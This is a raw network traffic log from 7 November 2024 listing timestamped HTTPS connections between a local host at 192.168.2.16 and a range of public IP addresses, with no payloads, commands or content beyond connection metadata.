                                                                Nov 7, 2024 21:40:06.018690109 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:06.018696070 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.018944025 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.023605108 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:06.027050972 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.027065992 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.027086020 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.046585083 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.046659946 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.046691895 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.046736956 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.046740055 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.046751022 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.046799898 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.047271013 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.047302961 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.047415018 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.047421932 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.047467947 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.047959089 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.067332983 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.091161013 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.091176033 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.106282949 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.106350899 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.106410027 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.106426954 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.106471062 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.107130051 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.107150078 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.107199907 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.107224941 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.107250929 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.107646942 CET49730443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.107659101 CET4434973013.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.109998941 CET49729443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.110023975 CET4434972913.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.120934963 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.120971918 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:06.121054888 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.121149063 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.121174097 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:06.121222019 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.121407032 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.121418953 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:06.121566057 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.121576071 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:06.138087034 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.156040907 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:06.157032013 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:06.157121897 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:06.157377958 CET49726443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:06.157388926 CET4434972613.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:06.162780046 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.162913084 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.163006067 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.163022995 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.163665056 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.163700104 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.163721085 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.163727999 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.163779020 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.163784027 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.164421082 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.164454937 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.164477110 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.164484978 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.164561987 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.164588928 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.186422110 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:06.186456919 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:06.186575890 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:06.186839104 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:06.186852932 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:06.201061964 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:06.216728926 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.216846943 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.216902971 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.217081070 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.217094898 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.217365980 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.217924118 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.217935085 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.218616009 CET49731443192.168.2.1613.107.246.44
                                                                Nov 7, 2024 21:40:06.218626976 CET4434973113.107.246.44192.168.2.16
                                                                Nov 7, 2024 21:40:06.218930006 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.218993902 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.220572948 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.220633984 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.220741034 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.220747948 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.222841024 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.222887993 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:06.222955942 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.223159075 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:06.223177910 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:06.264039040 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.264098883 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.264707088 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.265156031 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.265171051 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.266077042 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.266140938 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.268094063 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.268155098 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.268281937 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.268290043 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.276655912 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276676893 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276684999 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276715040 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276722908 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276732922 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276741982 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.276752949 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.276772976 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.276793957 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.277559042 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.277616024 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.277663946 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:06.279396057 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:06.279412985 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.279423952 CET49723443192.168.2.16184.28.90.27
                                                                Nov 7, 2024 21:40:06.279428959 CET44349723184.28.90.27192.168.2.16
                                                                Nov 7, 2024 21:40:06.279834032 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280072927 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280127048 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.280129910 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280141115 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280193090 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.280776024 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280843019 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280877113 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280884981 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.280895948 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.280939102 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.281580925 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.312033892 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.321651936 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:06.321697950 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:06.321778059 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:06.322999954 CET49741443192.168.2.164.175.87.197
                                                                Nov 7, 2024 21:40:06.323012114 CET443497414.175.87.197192.168.2.16
                                                                Nov 7, 2024 21:40:06.328131914 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.394078016 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.394100904 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.394153118 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.394166946 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.394211054 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.394226074 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.396617889 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.396631002 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.396682024 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.397294998 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.397303104 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.397361994 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.397783995 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.398184061 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.398240089 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.398252010 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.398293972 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.398766994 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.398772955 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.398830891 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.446161032 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.486057997 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.497493029 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.497556925 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.497602940 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.497618914 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.497648954 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.498970985 CET49727443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.498989105 CET44349727152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.511322021 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.511342049 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.511385918 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.511409044 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.511423111 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.511435986 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.511446953 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.511481047 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.511776924 CET49722443192.168.2.1613.227.219.40
                                                                Nov 7, 2024 21:40:06.511786938 CET4434972213.227.219.40192.168.2.16
                                                                Nov 7, 2024 21:40:06.513711929 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.513725996 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.513778925 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.514329910 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.514337063 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.514374971 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.514815092 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.514882088 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.515115976 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.515158892 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.516297102 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.516329050 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.516393900 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.516596079 CET49743443192.168.2.16152.199.21.175
                                                                Nov 7, 2024 21:40:06.516604900 CET44349743152.199.21.175192.168.2.16
                                                                Nov 7, 2024 21:40:06.539618969 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.539938927 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.539963961 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.540848017 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.540914059 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.541275024 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.541328907 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.541460037 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.541476011 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.568536997 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.568547964 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.568583012 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.568595886 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.568608046 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.568614960 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.568639040 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.568650961 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.568665981 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.568696976 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.569215059 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.569269896 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.569273949 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.569315910 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.569884062 CET49725443192.168.2.16192.229.133.221
                                                                Nov 7, 2024 21:40:06.569900990 CET44349725192.229.133.221192.168.2.16
                                                                Nov 7, 2024 21:40:06.586240053 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.586464882 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.586483002 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.587330103 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.587388992 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.587733030 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.587827921 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.587888956 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.587894917 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.596036911 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.630717039 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.630819082 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.631042957 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.631095886 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.631300926 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.631350040 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.631360054 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.631397963 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.631413937 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.631455898 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.633842945 CET49724443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.633862972 CET44349724104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.643040895 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.676711082 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.676754951 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.676830053 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.677207947 CET49745443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.677215099 CET44349745104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.680414915 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.680447102 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.680512905 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.680691004 CET49746443192.168.2.16104.17.24.14
                                                                Nov 7, 2024 21:40:06.680699110 CET44349746104.17.24.14192.168.2.16
                                                                Nov 7, 2024 21:40:06.736524105 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.736880064 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.736912012 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.736932993 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.736955881 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.737015009 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.737165928 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.737489939 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.737529039 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.737534046 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.737874031 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.737912893 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.737917900 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:06.786449909 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:06.802062035 CET49678443192.168.2.1620.189.173.10
                                                                Nov 7, 2024 21:40:07.074048996 CET49673443192.168.2.16204.79.197.203
                                                                Nov 7, 2024 21:40:07.129751921 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.129875898 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.129906893 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.129936934 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.129945993 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.129971027 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.129987001 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.130501986 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.130532980 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.130563974 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.130587101 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.130594015 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.130619049 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.131460905 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.133539915 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.133629084 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.133637905 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.133799076 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.133821011 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.134116888 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.134727955 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.134733915 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.134794950 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.134852886 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.135119915 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.135148048 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.135160923 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.135166883 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.135315895 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.135324955 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.135329962 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.135380983 CET4434973713.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.135605097 CET49737443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.135775089 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.136034966 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.136087894 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.136095047 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.136178017 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.136264086 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.136288881 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.136472940 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.136657000 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.136734009 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.136763096 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.136853933 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.136871099 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.137002945 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137021065 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137025118 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137078047 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.137079000 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.137088060 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137088060 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137139082 CET44349735188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137145996 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.137176991 CET49735443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.137439013 CET4434973813.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.137500048 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.137756109 CET4434973913.107.246.45192.168.2.16
                                                                Nov 7, 2024 21:40:07.137773991 CET4434974013.107.246.64192.168.2.16
                                                                Nov 7, 2024 21:40:07.137813091 CET49739443192.168.2.1613.107.246.45
                                                                Nov 7, 2024 21:40:07.137819052 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137845993 CET49740443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.137857914 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137867928 CET49736443192.168.2.16188.114.97.3
                                                                Nov 7, 2024 21:40:07.137873888 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137911081 CET44349736188.114.97.3192.168.2.16
                                                                Nov 7, 2024 21:40:07.137918949 CET49738443192.168.2.1613.107.246.64
                                                                Nov 7, 2024 21:40:07.137938023 CET49736443192.168.2.16188.114.97.3
